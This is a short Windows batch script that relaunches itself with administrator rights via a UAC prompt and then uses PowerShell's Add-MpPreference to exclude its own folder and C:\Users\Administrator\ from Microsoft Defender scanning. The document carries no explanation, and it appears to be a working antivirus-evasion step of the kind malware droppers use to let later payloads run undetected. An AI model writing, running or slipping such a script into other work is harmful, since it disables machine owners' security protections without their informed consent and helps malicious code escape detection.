@echo off
if not "%1"=="am_admin" (powershell start -verb runas '%0' am_admin & exit /b)
SET szExecutePath=%~dp0
SET szExecutePath2="%szExecutePath%"
Powershell.exe Add-MpPreference -ExclusionPath ""%szExecutePath2%"" 
Powershell.exe Add-MpPreference -ExclusionPath "C:\Users\Administrator\" 
